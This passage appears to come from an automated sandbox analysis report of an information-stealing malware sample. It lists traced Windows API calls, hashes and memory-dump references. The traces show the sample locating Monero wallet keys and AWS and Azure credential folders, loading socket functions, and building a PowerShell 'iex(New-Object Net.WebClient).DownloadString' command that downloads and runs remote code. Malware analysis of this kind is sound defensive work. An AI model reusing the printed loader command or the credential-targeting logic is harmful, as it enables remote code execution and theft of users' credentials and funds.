                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 30356d43868026e66cb99f5eccb4664cba0caef45406f6d4a0db6fffbf0f6a38
                                • Instruction ID: 27785f0740d9e5c6bed267959a214ff5e92e3bf2b7a866b7e281d4ab9238efab
                                • Opcode Fuzzy Hash: 30356d43868026e66cb99f5eccb4664cba0caef45406f6d4a0db6fffbf0f6a38
                                • Instruction Fuzzy Hash: A4B1B330A102199BEF72EF79DD49A6E3BE8AF04304F141068FB85E7291DB78DC419794
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010057D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 01005804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010058C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010058D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010058F8
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005988
                                • lstrlen.KERNEL32(01021794), ref: 0100599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010059B9
                                • lstrcat.KERNEL32(00000000,01021794), ref: 010059C5
                                • lstrlen.KERNEL32(00D6D248), ref: 010059D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010059F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01005A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 01005A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005BB5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01005BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01005C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01005C70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 7870ac23fe7429bd2a125440d672382d5602a634d7318fbdb4ac0e8a4975004f
                                • Instruction ID: b79597c96cf5ffb3aebbfbd4f70337aafa3a6be110939ad227c5d8be51f5264c
                                • Opcode Fuzzy Hash: 7870ac23fe7429bd2a125440d672382d5602a634d7318fbdb4ac0e8a4975004f
                                • Instruction Fuzzy Hash: 5E02B6709012199FEF72EF68DC89AAE7BF9AF44300F144068FA45A7290DB78DD459F90
                                APIs
                                  • Part of subcall function 00FF1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1135
                                  • Part of subcall function 00FF1120: RtlAllocateHeap.NTDLL(00000000), ref: 00FF113C
                                  • Part of subcall function 00FF1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00FF1159
                                  • Part of subcall function 00FF1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FF1173
                                  • Part of subcall function 00FF1120: RegCloseKey.ADVAPI32(?), ref: 00FF117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00FF11C0
                                • lstrlen.KERNEL32(?), ref: 00FF11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00FF11E8
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF121F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1251
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FF1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00FF1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00FF1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF12BA
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF12FF
                                • lstrlen.KERNEL32(00D6D398), ref: 00FF130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1335
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1378
                                • lstrcat.KERNEL32(00000000), ref: 00FF1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00FF13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF143D
                                  • Part of subcall function 0100EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0100EE12
                                • DeleteFileA.KERNEL32(?), ref: 00FF1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 873ac5ffcb2e3276206ce7ca5381f77c179d663f25d2b1e310951b56067f4c0f
                                • Instruction ID: 2e955558c237b62b5f36f8123794e4a875ae3eef37e684ef16fbe9c461d3cdc7
                                • Opcode Fuzzy Hash: 873ac5ffcb2e3276206ce7ca5381f77c179d663f25d2b1e310951b56067f4c0f
                                • Instruction Fuzzy Hash: 01A17F31E10219ABDB31EFA4DC89ABE77B8BF44310F041028FA05E7265DB78DD41AB90
                                APIs
                                • memset.MSVCRT ref: 0100E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0100E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 0100E7C6
                                • memset.MSVCRT ref: 0100E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0100E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 0100E886
                                • memset.MSVCRT ref: 0100E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0100E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E920
                                • lstrcat.KERNEL32(?,00000000), ref: 0100E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0100E947
                                • memset.MSVCRT ref: 0100E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 57f7cf6d478b3b5f750caa3891a6cc56bcf48abed30796b0cd931e6a7e024a95
                                • Instruction ID: 0def53e590ad90d4d6f8fc74a3c2bfb196b060a5d0aa8bb7852fd304bfeb8c6b
                                • Opcode Fuzzy Hash: 57f7cf6d478b3b5f750caa3891a6cc56bcf48abed30796b0cd931e6a7e024a95
                                • Instruction Fuzzy Hash: 4171D87194022CABEB71EB64DC4AFED7774AF48700F400898F759AB1C0DBB89B848B54
                                APIs
                                • lstrcpy.KERNEL32 ref: 0100ABCF
                                • lstrlen.KERNEL32(00D6EBB0), ref: 0100ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ACB7
                                • lstrlen.KERNEL32(01024AD4), ref: 0100ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ACF3
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 0100ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD28
                                • lstrlen.KERNEL32(01024AD4), ref: 0100AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD5C
                                • lstrcat.KERNEL32(00000000,01024AD4), ref: 0100AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AD91
                                • lstrlen.KERNEL32(00D6EA30), ref: 0100ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100AE6F
                                • lstrlen.KERNEL32(00000000), ref: 0100AE85
                                • lstrcpy.KERNEL32(00000000,00D6EC28), ref: 0100AEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 7c6e7ab9b8001b4b6d0d7ae06ec7346efd44c5034c6f2a170cd155891ec086bd
                                • Instruction ID: 41fcee77ac02fb1604405cebad4291c8a96ff31d5769c2e4e8b5bfd02ebbbb73
                                • Opcode Fuzzy Hash: 7c6e7ab9b8001b4b6d0d7ae06ec7346efd44c5034c6f2a170cd155891ec086bd
                                • Instruction Fuzzy Hash: 08B18130A1061AEBEB72EF68DC49ABF77F9AF40304F040464FA45972A5DB78D941DB90
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,010072A4), ref: 010147E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 010147FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0101480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0101481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 0101482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 01014840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 01014851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 01014862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 01014873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 01014884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 01014895
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: e9493215f87182999ec3aac7606e8c1e84ad48d90e90f35a2af0977b9ab94a8d
                                • Instruction ID: beb79afdd29c3bed9fd7e6d444ad374ddabb0ceef4b30675137d5e3a5115d9d8
                                • Opcode Fuzzy Hash: e9493215f87182999ec3aac7606e8c1e84ad48d90e90f35a2af0977b9ab94a8d
                                • Instruction Fuzzy Hash: 7A11BA72952334BBDB309FB5BC0EE9E3AF8BA09619714281EF591EA118D6F88140DF54
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100BE53
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100BE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0100BE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100BEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0100BEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0100BEEB
                                • lstrlen.KERNEL32(')"), ref: 0100BEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 0100BF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0100BF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100BF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0100BF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100BFBA
                                • ShellExecuteEx.SHELL32(?), ref: 0100C00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: 14d1620639190955b8ac441cc665820cca4c2f9b3b2a73b1ebf49d8de92c26ec
                                • Instruction ID: e1ff87c8af792b8e4d73f6013b3c6a355e059d6f3e46416f0d0685ee98af4530
                                • Opcode Fuzzy Hash: 14d1620639190955b8ac441cc665820cca4c2f9b3b2a73b1ebf49d8de92c26ec
                                • Instruction Fuzzy Hash: 7461D334A10259ABFF72AFB99C8D67F7BE8AF04300F001468F645E7291DB78C9419B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101184F
                                • lstrlen.KERNEL32(00D56B90), ref: 01011860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010118C1
                                • lstrlen.KERNEL32(01024FA0), ref: 010118D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010118F4
                                • lstrcat.KERNEL32(00000000,01024FA0), ref: 01011900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101192F
                                • lstrlen.KERNEL32(00D56AE0), ref: 01011945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010119A6
                                • lstrlen.KERNEL32(01024FA0), ref: 010119B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010119D9
                                • lstrcat.KERNEL32(00000000,01024FA0), ref: 010119E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A14
                                • lstrlen.KERNEL32(00D56BF0), ref: 01011A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011A8B
                                • lstrlen.KERNEL32(00D56A20), ref: 01011AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01011AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01011B02
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
